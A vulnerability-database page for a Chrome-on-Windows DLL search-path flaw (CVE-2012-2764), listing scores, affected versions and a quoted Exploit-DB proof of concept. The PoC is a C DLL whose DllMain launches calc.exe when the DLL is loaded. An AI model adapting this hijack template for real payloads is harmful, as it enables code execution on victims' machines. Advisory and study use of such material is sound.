CVE-2012-2764 : Detail

CVE-2012-2764

0.06%V3
Local
2012-06-27 08:00 +00:00
2017-09-18 10:57 +00:00

Alert for a CVE

Stay informed of any changes for a specific CVE.
Alert management

Descriptions

Untrusted search path vulnerability in Google Chrome before 20.0.1132.43 on Windows might allow local users to gain privileges via a Trojan horse Metro DLL in the current working directory.

Informations

Metrics

Metric Score Severity CVSS Vector Source
V2 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 37510

Publication date : 2012-06-25 22:00 +00:00
Author : Moshe Zioni
EDB Verified : Yes

/* source: https://www.securityfocus.com/bid/54477/info Google Chrome is prone to a vulnerability that lets attackers execute arbitrary code. An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Linked Library (DLL) file. Google Chrome 19.0.1084.21 through versions 20.0.1132.23 are vulnerable. Note: This issue was previously discussed in BID 54203 (Google Chrome Prior to 20.0.1132.43 Multiple Security Vulnerabilities), but has been given its own record to better document it. */ #include int hijack_poc () { WinExec ( "calc.exe" , SW_NORMAL ); return 0 ; } BOOL WINAPI DllMain ( HINSTANCE hinstDLL , DWORD dwReason , LPVOID lpvReserved ) { hijack_poc () ; return 0 ; }

Products Mentioned

Configuraton 0

Google>>Chrome >> Version To (including) 20.0.1132.42

Google>>Chrome >> Version 20.0.1132.0

Google>>Chrome >> Version 20.0.1132.1

Google>>Chrome >> Version 20.0.1132.2

Google>>Chrome >> Version 20.0.1132.3

Google>>Chrome >> Version 20.0.1132.4

Google>>Chrome >> Version 20.0.1132.5

Google>>Chrome >> Version 20.0.1132.6

Google>>Chrome >> Version 20.0.1132.7

Google>>Chrome >> Version 20.0.1132.8

Google>>Chrome >> Version 20.0.1132.9

Google>>Chrome >> Version 20.0.1132.10

Google>>Chrome >> Version 20.0.1132.11

Google>>Chrome >> Version 20.0.1132.12

Google>>Chrome >> Version 20.0.1132.13

Google>>Chrome >> Version 20.0.1132.14

Google>>Chrome >> Version 20.0.1132.15

Google>>Chrome >> Version 20.0.1132.16

Google>>Chrome >> Version 20.0.1132.17

Google>>Chrome >> Version 20.0.1132.18

Google>>Chrome >> Version 20.0.1132.19

Google>>Chrome >> Version 20.0.1132.20

Google>>Chrome >> Version 20.0.1132.21

Google>>Chrome >> Version 20.0.1132.22

Google>>Chrome >> Version 20.0.1132.23

Google>>Chrome >> Version 20.0.1132.24

Google>>Chrome >> Version 20.0.1132.25

Google>>Chrome >> Version 20.0.1132.26

Google>>Chrome >> Version 20.0.1132.27

Google>>Chrome >> Version 20.0.1132.28

Google>>Chrome >> Version 20.0.1132.29

Google>>Chrome >> Version 20.0.1132.30

Google>>Chrome >> Version 20.0.1132.31

Google>>Chrome >> Version 20.0.1132.32

Google>>Chrome >> Version 20.0.1132.33

Google>>Chrome >> Version 20.0.1132.34

Google>>Chrome >> Version 20.0.1132.35

Google>>Chrome >> Version 20.0.1132.36

Google>>Chrome >> Version 20.0.1132.37

Google>>Chrome >> Version 20.0.1132.38

Google>>Chrome >> Version 20.0.1132.39

Google>>Chrome >> Version 20.0.1132.40

Google>>Chrome >> Version 20.0.1132.41

Microsoft>>Windows >> Version *

References

Click on the button to the left (OFF), to authorize the inscription of cookie improving the functionalities of the site. Click on the button to the left (Accept all), to unauthorize the inscription of cookie improving the functionalities of the site.